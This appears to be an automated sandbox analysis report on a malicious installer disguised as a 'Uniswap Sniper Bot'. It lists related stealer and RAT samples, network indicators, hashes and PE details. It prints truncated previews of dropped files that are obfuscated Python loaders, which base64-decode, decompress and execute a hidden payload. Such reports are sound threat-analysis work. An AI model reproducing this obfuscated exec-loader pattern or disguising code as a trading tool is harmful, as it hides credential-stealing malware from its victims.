Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Uniswap Sniper Bot With GUI.exe
Detection:	MAL
Classification:	mal72.troj.spyw.winEXE@54/1814@5/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.19.10, 142.251.32.99, 172.217.165.131, 13.107.246.63, 172.202.163.200, 23.218.208.109
Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Uniswap Sniper Bot With GUI.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	K98766700.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	phost.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	ahost.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	wsapx.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	ip-api.com/json/?fields=225545
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	ip-api.com/json/
	bigfa.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
185.153.182.241	my2gf4tNEk.exe	Get hash	malicious	Unknown	Browse	/client/7/702
185.153.182.241	my2gf4tNEk.exe	Get hash	malicious	Unknown	Browse	/uploads

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	33abb.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	56ff7c.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
dualstack.python.map.fastly.net	AS6xKJzYJT.exe	Get hash	malicious	Python Stealer, XenoRAT	Browse	151.101.0.223
	uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	151.101.192.223
	Fw3icx4ZWB.exe	Get hash	malicious	Unknown	Browse	151.101.64.223
	file.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	file.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	file.exe	Get hash	malicious	Growtopia	Browse	151.101.0.223
	file.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	3Af7PybsUi.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	3Af7PybsUi.exe	Get hash	malicious	Unknown	Browse	151.101.128.223
	1bhYyrjyNk.vbs	Get hash	malicious	Unknown	Browse	146.75.116.223

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	secure.htm	Get hash	malicious	HTMLPhisher	Browse	185.199.110.153
	archive.htm	Get hash	malicious	HTMLPhisher	Browse	185.199.111.153
	in.exe	Get hash	malicious	Babadeda, HTMLPhisher	Browse	185.199.108.153
	Pl8Tb06C8A.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	Pl8Tb06C8A.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
DEDIPATH-LLCUS	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse	193.43.68.66
	my2gf4tNEk.exe	Get hash	malicious	Unknown	Browse	185.153.182.241
	my2gf4tNEk.exe	Get hash	malicious	Unknown	Browse	185.153.182.241
	teste.arm.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	66.150.136.66
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.143.195.104
	9jCa1zq5XE.exe	Get hash	malicious	AsyncRAT	Browse	2.56.179.212
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	45.12.130.27
	boatnet.sh4.elf	Get hash	malicious	Mirai	Browse	45.12.130.27
TUT-ASUS	K98766700.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	phost.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	ahost.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	wsapx.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	bigfa.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Kopia%20p%C5%82atno%C5%9Bci_Santander_TF1903218545300000564290004.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	Kopia%20p%C5%82atno%C5%9Bci_Santander_TF1903218545300000564290004.exe	Get hash	malicious	Unknown	Browse	151.101.0.223
	archive.htm	Get hash	malicious	HTMLPhisher	Browse	151.101.0.223
	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	151.101.0.223
	3181425fa7464801a03868a1adf86bc1.ps1	Get hash	malicious	Unknown	Browse	151.101.0.223
	in.exe	Get hash	malicious	Babadeda, HTMLPhisher	Browse	151.101.0.223
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	151.101.0.223
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	151.101.0.223
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	151.101.0.223
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.0.223

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\.pyp\DLLs\_bz2.pyd	discord.exe	Get hash	malicious	Unknown	Browse
	my2gf4tNEk.exe	Get hash	malicious	Unknown	Browse
	uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse
	uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse
	UwOcZADSmi.exe	Get hash	malicious	AsyncRAT	Browse
	IyWKJMlCXg.exe	Get hash	malicious	XWorm	Browse
	souFnS89FP.exe	Get hash	malicious	Unknown	Browse
	downgrade.exe	Get hash	malicious	Unknown	Browse
	J33WM5suMd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
C:\Users\user\.pyp\DLLs\_asyncio.pyd	my2gf4tNEk.exe	Get hash	malicious	Unknown	Browse
	my2gf4tNEk.exe	Get hash	malicious	Unknown	Browse
	uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse
	uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse
	J33WM5suMd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SecuriteInfo.com.FileRepMalware.3650.10061.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.FileRepMalware.3650.10061.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Stealer.1251.28918.16642.exe	Get hash	malicious	Python Stealer	Browse
	SecuriteInfo.com.Python.Stealer.1251.28918.16642.exe	Get hash	malicious	Python Stealer	Browse

Process:	C:\Users\user\.pyp\python.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	223927
Entropy (8bit):	6.00202653623362
Encrypted:	false
SSDEEP:	3072:GdqDpGNIR2k5f6kPOuF0/UnaH0CBeWre+g+MWeW8ShPppC643Q8TVCkPnZ8Z2c8A:GdkqIsQ0/xHNBHreTfW86pcZCkP+wc8A
MD5:	5FBD411EE97D7E89592DBC1633338788
SHA1:	0EAD57F6BC639B65808A325C230A8DB7E1BFBEA0
SHA-256:	DE6927053BCD2E404EDB4F1748D152171B46A295C967A3F9C9F0EDFD85E8F94A
SHA-512:	2CE5D23EBAB7A116D298D5C93895BCCB20AA97F1C62FF68298ECAE1B82009A32AC16972FE76B4CF359B0152DDB6B34E1F64B158E3BBC79B40F6CF74C9EB8DA89
Malicious:	false
Preview:	_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'rWRFENg///3PrCN8GryKPaEe8qQCTCSpCoNz2cZa501/aQCOoWo/jZ2leNtTTshgd92s73JhSGnhY0nrbmuhUc1vjnhXj5X8sSD87xASHJYNHAVjzeLREnNBshF35XCKsDnMknKuQnwjQZEYmDFfbGCze4dGk6r8Ofb1hsSISConGdXXLC0v5R+pcxnxC6XG2VjSYAWfvdvt0as2xGSBCVPSGLR91T/Q48C65PcL2TMYVkH5LamEjNvhamaTdlCKU0KmuDlkF4UhRkKkuhszhzD8Ivufp3DnDd6BYloKSdCiPPt5ucH8JfQ9XbdzwAHlwJWQZENN0TMX7+rl38rfJUjwPY8aXNdF2YDZQl9xGq8sGUA/WxnN/o3dl8GMqFu3LwGkcEV06Ik444iBc0ENkD8gwTPxIlmEnzgW/nsfnMUEf7Yt5ltM2wrVy7ss4mCpT/ncEpghShTt60Apq513L89g4HA4xZhfhrfMp8yh2AkZEWYU9lyzTaarK4+spXrjfpT4uSD8kXR6l0N9ES33WKcwTLInghYrR0GfXhmwdzxxZue+zRrapR0HIuxStftoCCa5tp8C22sO4ZKpt9rgK57EW5ejX104oNLd8Y+vukCi47zXywS9Us+EwYVOoRZzuUZeSQgL05D7TA0hOYXNgZzWQygfi7EY3zHxLElPNa8fuMBalTdQOhlVvxqabv+v/W7PhI//YAOsTZyTa9XZa32VDiICvr9wL4rXOS/q6rh3XlCTGi9zC0OLR31Lo54NuPXAo2tfZBjs+oB5X+v+9XqX4EayfGTFWTM0D/KUA4G9tL7mux8oP2LviVZdW2oXOIfHLa6qbVW4VG+TRHyZ2nU/J4dHjE6PfgLOeS5WTmioazL/7epjOwB5DsqOe2rmAbyYl

Process:	C:\Windows\System32\tar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	63864
Entropy (8bit):	6.127647865641386
Encrypted:	false
SSDEEP:	1536:n2eoB+WKE4+0Ib1Qxh4XNnEapxIg5ni87SyjPxt:n2eo4pg0IpQxh4XBEapxIg5ndJxt
MD5:	47DE17275C73CFCDCE18ACE16CD4F355
SHA1:	5D6B9B1D4534EEAE0A3B72BFA359BB4818E4C86E
SHA-256:	D667822030BA160CD8770569AFEC2C029B5247CEAA401D9268FE98BBEA9E4C11
SHA-512:	E11637808DDAF14D0ABDB88A389E6947B16F272D97642312C99EC38BBCAF43E3594D8F89BC8699D769368704A81BC1F01EDFFA69AB736665C1C192AEED780C8F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: my2gf4tNEk.exe, Detection: malicious, Browse Filename: my2gf4tNEk.exe, Detection: malicious, Browse Filename: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, Detection: malicious, Browse Filename: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, Detection: malicious, Browse Filename: J33WM5suMd.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.3650.10061.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.3650.10061.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Stealer.1251.28918.16642.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Stealer.1251.28918.16642.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./TF.A.F.A.F.A.O...D.A...@.D.A...D.J.A...E.N.A...B.E.A...@.E.A...@.D.A.F.@..A...L.G.A...A.G.A....G.A...C.G.A.RichF.A.................PE..d...Z..c.........." ...".R..........`................................................T....`.............................................P...`...d.......................x)..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata..~J...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe
File Type:	ASCII text, with very long lines (5066)
Category:	dropped
Size (bytes):	5067
Entropy (8bit):	6.041901189355394
Encrypted:	false
SSDEEP:	96:FSCVaWfH4ZuKgwYtfhZ9W+GBeJV9xREus/qf/7G145QOyrKAGRi02emT0:Fjgqt5DJVvume4VgKAoib0
MD5:	597A7F260E9DD344B80FDAC363204EE2
SHA1:	5E27E91DC3F092B3956DC639659AB78AFF3FFA89
SHA-256:	82ADD5AE279B8CE380BE68BABFBE314B69AC1BAD63064D4FB4CAAFE494A1962E
SHA-512:	8D4124275E5D951E21F1B5B615CF6BF547BCF87167C27FA778DCF959F00A26789C4B82642318C57EDD3173390CF8AE619A19FBEAB2418FA4E52485A3AF0C9248
Malicious:	false
Preview:	_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'=c3XKw7D+//vnrftvxAaCcfAakAzo0vClKBdS/pXN3zUvjn2t1FYSMZofCKjmOMoB4K0ARAFtfKaL9t1Duoh0NoopRuPmkJzvwq03t3oYoyTPz1u/0Zx1DpfOQ2A+eZUhUmViN6++FXIy/9EphkN+6RQ1I+lqS9dnQ2hSUQtGSOwRYCvDUwIkBds7UgPayW4yrdtpZ6OwCNKRgwr/dEDF25ZdMc2HWnKr2/0YGdMxmUEOVG9w4LN6y1j0MOgoHJ5SOynUYjgNwd66UGKh2nRGTJCtEB4eUJsz0PCukI8qmkxhCT5k0zV0ZEA7o5o2hWFeMFka5J4kim3ohN+MVO9H3hcQgvaiFGlCtxc229O8gp6r3EK7AJ8DOB1it6IImt5s4OkZWJP0Ny/PbwWKLTRM7MVL4WZTJVSafzXlQI0j25gL9ciGNlpUUZ9nCtaMifUGHmhx4wHUcsTXmn79VqF+/R2zUlPOmRihy//yLJ+qqye5VFQrk/K/F6e6tCtzx0DScO7pOGjXemux7gnOuxHCvCpQsnUeZHlWp2Rf4Iw3zWlPNuiSRfv3c/0NWiHUEMU1g7VmgiN0c59C2Slg4PzL6q7WmphKoVGaLe0KUc5/O83MC2yZrSKcO1TCRKV4VxN2H/ac/AoogV7M/aN7OTSkF6vvmqh21rcpqgY0qfECg2sf+qKjHAtRCnLcn/xrIvh4MKyHyTAEG/gWJAEVprIMgidO5/mv5BhsjRpIOmKCk66LZk8JeCnMgc+sz3uHeywXL9U3ToLx0ctS2CU3WJ9NFtlnEA2FbrdTOhuuPDhGwg8txebUS5i0q18pMwoJ+9pTE7ZYw7QPLDV+jZr4+WHZrRkP718dzsEH87ZAKMRiUUQQ7QKcnGUjDeQ6XReHDz/kw9fv

Process:	C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	5.13006727705212
Encrypted:	false
SSDEEP:	24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
MD5:	4D42118D35941E0F664DDDBD83F633C5
SHA1:	2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
SHA-256:	5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
SHA-512:	3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
Malicious:	false
Preview:	Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Process:	C:\Windows\System32\curl.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	51476596
Entropy (8bit):	7.993454941705
Encrypted:	true
SSDEEP:
MD5:	38D365898FD6ACBB4788E654E864922D
SHA1:	281C2F8060DD3F0B244AE2282C3D3D406F8DD458
SHA-256:	6A104F07AB6C5711B6BC8BF6FF956AB8CD597A388002A966E980C5EC9678B5B0
SHA-512:	AD29325EA5F2A9744206E3282EB26656AAA70D4F83BEAE79330AA69A947701905CB7F353F6CABCA663179D0AA1305B300995E575A011B813FC1B73E63AF21F2C
Malicious:	false
Preview:	PK........$..V.................pyp/PK...........V.................pyp/DLLs/PK........O..Uu...h"..`.4......pyp/DLLs/libcrypto-1_1.dll..X.K.....uc...Ult..b.....P.T..E=....;A...@l...~.....~...?........1.=3k.Z3.f.Zk..-.....C"....`.c.}.......C..R.v$?.kO.....u...w_..}..t..W/_?..........S....z.v.T$U...8....m.x.....f?.V<@....b^h.;.<...b.c.;.........z4.<S.?..Q......j^d..]<.o...A..]i...T....q\2C.E.....m..d.0....f...6...&G$0....I.?..k..ae.%.. .R.....Kv-j..5.!.@.Ce...a..P...Y..E..w~}..a..k0DD.2.....}.P,....!"./_......<g.E....^.I`........1:..P...{..[..X.\$..!. ."......X....,.;...............\.[l.6...hr.._..v...`....JX..p.(._...C..U.......u..U.w...7X...rU...<gx"w.Oa..[...9dpFC......G.8."7.p6Dz,Io.t......r&Cd....;.9."s..m.L.]...U.-Y.."..;."W5.`..8P.B...x.\...Y........+.r........l...s.Z.Z.&.T.z.....\.[zu..g.../E...I!4...X<.!...4.F.o...k..."....rnT..4D.,."K6e3D.v...[K...^.T$.n.9.D.m. .]......jX7.=...<....W.I...RI...B.>.2D&.../&..lK..........J.B..x...9.KbCd...b.

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.999974663762104
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Uniswap Sniper Bot With GUI.exe
File size:	74'110'256 bytes
MD5:	efbc268a345e5a3089ca0640353b98cc
SHA1:	1d7709aee3b9dcd1f58794abccc8b83d6f0a1cfd
SHA256:	d61fd1a98ec6f6bbb56baaf9e9d64a455f9fea9f4e3ca3a7b5ce3d49cc7ac392
SHA512:	33c7cfd48dbbdbf4c86e039060faf5857d1f3d1d6a8b48a26f96b491e96c92c10cc8551d132baae7a6dca8eea5867d0e1a4a505128052e76cc81eaf63ec56829
SSDEEP:	1572864:dmHO97sQr6xqwga6/P9YZgvLGdnwL6slKs5yqQ/sRz:d6O97rcr6/P9YmvLGdnwLplh5yqQ/sRz
TLSH:	9BF733762393EB60CB4353FBC29D52A700828385A9767A0399DC7C7858FE1244DDE67E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...8...@.

Entrypoint:	0x40338f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19f000	0x59a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6627	0x6800	7618d4c0cd8bb67ea9595b4266b3a91f	False	0.6646259014423077	data	6.450282348506287	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a2	0x1600	eecac1fed9cc6b447d50940d178404d8	False	0.4405184659090909	data	5.025178929113415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x70ff8	0x600	db8f31a08a2242d80c29e1f9500c6527	False	0.5182291666666666	data	4.037117731448378	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7b000	0x124000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x19f000	0x59a0	0x5a00	08c4991250f5de79c45db0a010df751d	False	0.4971788194444444	data	5.4610253129803485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x19f5c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7213883677298312
RT_ICON	0x1a0670	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colors	English	United States	0.6751066098081023
RT_ICON	0x1a1518	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colors	English	United States	0.7851985559566786
RT_ICON	0x1a1dc0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors	English	United States	0.6560693641618497
RT_ICON	0x1a2328	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8031914893617021
RT_ICON	0x1a2790	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.3118279569892473
RT_ICON	0x1a2a78	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.36824324324324326
RT_DIALOG	0x1a2ba0	0x202	data	English	United States	0.4085603112840467
RT_DIALOG	0x1a2da8	0xf8	data	English	United States	0.6290322580645161
RT_DIALOG	0x1a2ea0	0xee	data	English	United States	0.6260504201680672
RT_DIALOG	0x1a2f90	0x1fa	data	English	United States	0.40118577075098816
RT_DIALOG	0x1a3190	0xf0	data	English	United States	0.6666666666666666
RT_DIALOG	0x1a3280	0xe6	data	English	United States	0.6565217391304348
RT_DIALOG	0x1a3368	0x1ee	data	English	United States	0.38866396761133604
RT_DIALOG	0x1a3558	0xe4	data	English	United States	0.6447368421052632
RT_DIALOG	0x1a3640	0xda	data	English	United States	0.6422018348623854
RT_DIALOG	0x1a3720	0x1ee	data	English	United States	0.3866396761133603
RT_DIALOG	0x1a3910	0xe4	data	English	United States	0.6359649122807017
RT_DIALOG	0x1a39f8	0xda	data	English	United States	0.6376146788990825
RT_DIALOG	0x1a3ad8	0x1f2	data	English	United States	0.39759036144578314
RT_DIALOG	0x1a3cd0	0xe8	data	English	United States	0.6508620689655172
RT_DIALOG	0x1a3db8	0xde	data	English	United States	0.6486486486486487
RT_DIALOG	0x1a3e98	0x202	data	English	United States	0.42217898832684825
RT_DIALOG	0x1a40a0	0xf8	data	English	United States	0.6653225806451613
RT_DIALOG	0x1a4198	0xee	data	English	United States	0.6512605042016807
RT_GROUP_ICON	0x1a4288	0x68	data	English	United States	0.6634615384615384
RT_VERSION	0x1a42f0	0x284	data	English	United States	0.4922360248447205
RT_MANIFEST	0x1a4578	0x423	XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators	English	United States	0.5127478753541076

DLL	Import
